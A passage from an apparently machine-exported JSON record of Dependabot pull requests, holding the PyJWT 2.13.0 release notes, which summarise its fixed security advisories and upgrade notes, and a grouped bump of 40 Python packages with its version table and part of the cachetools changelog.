decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ccode\u003ev2.12.1 \u0026amp;lt;https://github.com/jpadilla/pyjwt/compare/2.12.0...2.12.1\u0026amp;gt;\u003c/code\u003e__\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/a4e1a3d1218b01c5806420b8f16d9308ac4adc30\"\u003e\u003ccode\u003ea4e1a3d\u003c/code\u003e\u003c/a\u003e Add typing_extensions dependency for Python \u0026lt; 3.11 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1151\"\u003e#1151\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/bd9700cca7f9258fadcc429c1034e508025931f2\"\u003e\u003ccode\u003ebd9700c\u003c/code\u003e\u003c/a\u003e Use PyJWK algorithm when encoding without explicit algorithm (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1148\"\u003e#1148\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.8.0...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/ywjung/zenith/pull/45","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/ywjung%2Fzenith/issues/45","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/45/packages"},{"uuid":"4565417266","node_id":"PR_kwDOSlL6KM7her48","number":12,"state":"closed","title":"deps(py): bump the python-minor group across 1 directory with 40 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-06-08T05:41:39.000Z","author_association":null,"state_reason":null,"created_at":"2026-06-01T18:28:07.000Z","updated_at":"2026-06-08T05:41:41.000Z","time_to_close":558812,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"deps(py): bump","group_name":"python-minor","update_count":40,"packages":[{"name":"cachetools","old_version":"7.0.5","new_version":"7.1.4","repository_url":"https://github.com/tkem/cachetools"},{"name":"choreographer","old_version":"1.2.1","new_version":"1.3.0","repository_url":"https://github.com/plotly/choreographer"},{"name":"click","old_version":"8.3.2","new_version":"8.4.1","repository_url":"https://github.com/pallets/click"},{"name":"decorator","old_version":"5.2.1","new_version":"5.3.1","repository_url":"https://github.com/micheles/decorator"},{"name":"duckdb","old_version":"1.5.2","new_version":"1.5.3","repository_url":"https://github.com/duckdb/duckdb-python"},{"name":"flask-wtf","old_version":"1.2.2","new_version":"1.3.0","repository_url":"https://github.com/pallets-eco/flask-wtf"},{"name":"greenlet","old_version":"3.3.2","new_version":"3.5.1","repository_url":"https://github.com/python-greenlet/greenlet"},{"name":"idna","old_version":"3.11","new_version":"3.17","repository_url":"https://github.com/kjd/idna"},{"name":"ipython","old_version":"9.12.0","new_version":"9.14.0","repository_url":"https://github.com/ipython/ipython"},{"name":"jedi","old_version":"0.19.2","new_version":"0.20.0","repository_url":"https://github.com/davidhalter/jedi"},{"name":"kaleido","old_version":"1.2.0","new_version":"1.3.0","repository_url":"https://github.com/plotly/kaleido"},{"name":"markdown-it-py","old_version":"4.0.0","new_version":"4.2.0","repository_url":"https://github.com/executablebooks/markdown-it-py"},{"name":"matplotlib-inline","old_version":"0.2.1","new_version":"0.2.2","repository_url":"https://github.com/ipython/matplotlib-inline"},{"name":"mcp","old_version":"1.27.0","new_version":"1.27.2","repository_url":"https://github.com/modelcontextprotocol/python-sdk"},{"name":"py-lets-be-rational","old_version":"1.0.1","new_version":"1.1.2","repository_url":"https://github.com/vollib/py_lets_be_rational"},{"name":"py-vollib","old_version":"1.0.1","new_version":"1.0.12","repository_url":"https://github.com/vollib/py_vollib"},{"name":"narwhals","old_version":"2.19.0","new_version":"2.22.0","repository_url":"https://github.com/narwhals-dev/narwhals"},{"name":"numpy","old_version":"2.4.4","new_version":"2.4.6","repository_url":"https://github.com/numpy/numpy"},{"name":"orjson","old_version":"3.11.8","new_version":"3.11.9","repository_url":"https://github.com/ijl/orjson"},{"name":"parso","old_version":"0.8.6","new_version":"0.8.7","repository_url":"https://github.com/davidhalter/parso"},{"name":"platformdirs","old_version":"4.9.6","new_version":"4.10.0","repository_url":"https://github.com/tox-dev/platformdirs"},{"name":"plotly","old_version":"6.6.0","new_version":"6.7.0","repository_url":"https://github.com/plotly/plotly.py"},{"name":"pydantic","old_version":"2.12.5","new_version":"2.13.4","repository_url":"https://github.com/pydantic/pydantic"},{"name":"pydantic-core","old_version":"2.41.5","new_version":"2.47.0","repository_url":"https://github.com/pydantic/pydantic"},{"name":"pydantic-settings","old_version":"2.13.1","new_version":"2.14.1","repository_url":"https://github.com/pydantic/pydantic-settings"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"python-engineio","old_version":"4.13.1","new_version":"4.13.2","repository_url":"https://github.com/miguelgrinberg/python-engineio"},{"name":"python-multipart","old_version":"0.0.26","new_version":"0.0.30","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"python-socketio","old_version":"5.16.1","new_version":"5.16.2","repository_url":"https://github.com/miguelgrinberg/python-socketio"},{"name":"python-telegram-bot","old_version":"22.6","new_version":"22.7","repository_url":"https://github.com/python-telegram-bot/python-telegram-bot"},{"name":"pytz","old_version":"2026.1.post1","new_version":"2026.2","repository_url":"https://github.com/stub42/pytz"},{"name":"requests","old_version":"2.33.1","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"},{"name":"sqlalchemy","old_version":"2.0.49","new_version":"2.0.50","repository_url":"https://github.com/sqlalchemy/sqlalchemy"},{"name":"tornado","old_version":"6.5.5","new_version":"6.5.6","repository_url":"https://github.com/tornadoweb/tornado"},{"name":"traitlets","old_version":"5.14.3","new_version":"5.15.0","repository_url":"https://github.com/ipython/traitlets"},{"name":"urllib3","old_version":"2.6.3","new_version":"2.7.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"uvicorn","old_version":"0.44.0","new_version":"0.48.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"wcwidth","old_version":"0.6.0","new_version":"0.7.0","repository_url":"https://github.com/jquast/wcwidth"},{"name":"wheel","old_version":"0.46.3","new_version":"0.47.0","repository_url":"https://github.com/pypa/wheel"},{"name":"wtforms","old_version":"3.2.1","new_version":"3.2.2","repository_url":"https://github.com/pallets-eco/wtforms"}],"path":null,"ecosystem":"pip"},"body":"Bumps the python-minor group with 40 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [cachetools](https://github.com/tkem/cachetools) | `7.0.5` | `7.1.4` |\n| [choreographer](https://github.com/plotly/choreographer) | `1.2.1` | `1.3.0` |\n| [click](https://github.com/pallets/click) | `8.3.2` | `8.4.1` |\n| [decorator](https://github.com/micheles/decorator) | `5.2.1` | `5.3.1` |\n| [duckdb](https://github.com/duckdb/duckdb-python) | `1.5.2` | `1.5.3` |\n| [flask-wtf](https://github.com/pallets-eco/flask-wtf) | `1.2.2` | `1.3.0` |\n| [greenlet](https://github.com/python-greenlet/greenlet) | `3.3.2` | `3.5.1` |\n| [idna](https://github.com/kjd/idna) | `3.11` | `3.17` |\n| [ipython](https://github.com/ipython/ipython) | `9.12.0` | `9.14.0` |\n| [jedi](https://github.com/davidhalter/jedi) | `0.19.2` | `0.20.0` |\n| [kaleido](https://github.com/plotly/kaleido) | `1.2.0` | `1.3.0` |\n| [markdown-it-py](https://github.com/executablebooks/markdown-it-py) | `4.0.0` | `4.2.0` |\n| [matplotlib-inline](https://github.com/ipython/matplotlib-inline) | `0.2.1` | `0.2.2` |\n| [mcp](https://github.com/modelcontextprotocol/python-sdk) | `1.27.0` | `1.27.2` |\n| [py-lets-be-rational](https://github.com/vollib/py_lets_be_rational) | `1.0.1` | `1.1.2` |\n| [py-vollib](https://github.com/vollib/py_vollib) | `1.0.1` | `1.0.12` |\n| [narwhals](https://github.com/narwhals-dev/narwhals) | `2.19.0` | `2.22.0` |\n| [numpy](https://github.com/numpy/numpy) | `2.4.4` | `2.4.6` |\n| [orjson](https://github.com/ijl/orjson) | `3.11.8` | `3.11.9` |\n| [parso](https://github.com/davidhalter/parso) | `0.8.6` | `0.8.7` |\n| [platformdirs](https://github.com/tox-dev/platformdirs) | `4.9.6` | `4.10.0` |\n| [plotly](https://github.com/plotly/plotly.py) | `6.6.0` | `6.7.0` |\n| [pydantic](https://github.com/pydantic/pydantic) | `2.12.5` | `2.13.4` |\n| [pydantic-core](https://github.com/pydantic/pydantic) | `2.41.5` | `2.47.0` |\n| [pydantic-settings](https://github.com/pydantic/pydantic-settings) | `2.13.1` | `2.14.1` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [python-engineio](https://github.com/miguelgrinberg/python-engineio) | `4.13.1` | `4.13.2` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.26` | `0.0.30` |\n| [python-socketio](https://github.com/miguelgrinberg/python-socketio) | `5.16.1` | `5.16.2` |\n| [python-telegram-bot](https://github.com/python-telegram-bot/python-telegram-bot) | `22.6` | `22.7` |\n| [pytz](https://github.com/stub42/pytz) | `2026.1.post1` | `2026.2` |\n| [requests](https://github.com/psf/requests) | `2.33.1` | `2.34.2` |\n| [sqlalchemy](https://github.com/sqlalchemy/sqlalchemy) | `2.0.49` | `2.0.50` |\n| [tornado](https://github.com/tornadoweb/tornado) | `6.5.5` | `6.5.6` |\n| [traitlets](https://github.com/ipython/traitlets) | `5.14.3` | `5.15.0` |\n| [urllib3](https://github.com/urllib3/urllib3) | `2.6.3` | `2.7.0` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.44.0` | `0.48.0` |\n| [wcwidth](https://github.com/jquast/wcwidth) | `0.6.0` | `0.7.0` |\n| [wheel](https://github.com/pypa/wheel) | `0.46.3` | `0.47.0` |\n| [wtforms](https://github.com/pallets-eco/wtforms) | `3.2.1` | `3.2.2` |\n\n\nUpdates `cachetools` from 7.0.5 to 7.1.4\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/tkem/cachetools/blob/master/CHANGELOG.rst\"\u003ecachetools's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ev7.1.4 (2026-05-22)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eMinor unit test improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate build environment.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev7.1.3 (2026-05-18)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eMinor type stub improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate build environment.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev7.1.2 (2026-05-16)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eMinor type stub improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMinor documentation improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eModernize build environment.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev7.1.1 (2026-05-03)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eVarious type stub improvements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev7.1.0 (2026-05-01)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type stubs based on the work of the good people at \u003ccode\u003etypeshed \u0026lt;https://github.com/python/typeshed/tree/main/stubs/cachetools/\u0026gt;\u003c/code\u003e__.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate unit tests.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev7.0.6 (2026-04-20)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eMinor code improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate project URLs.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate CI environment.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/48284d73d0a8834c9c50f8d41bb99e6f93b2dfed\"\u003e\u003ccode\u003e48284d7\u003c/code\u003e\u003c/a\u003e Release v7.1.4.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/55ea96b88a485fca9effae0f838186274f00897c\"\u003e\u003ccode\u003e55ea96b\u003c/code\u003e\u003c/a\u003e Update build environment.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/c5439fe5dc883220b59469e450dbcbf9f4c2e52d\"\u003e\u003ccode\u003ec5439fe\u003c/code\u003e\u003c/a\u003e Add threading tests for lock-only decorators.\u003c/li\u003e\n\u003cli\u003e\u003ca 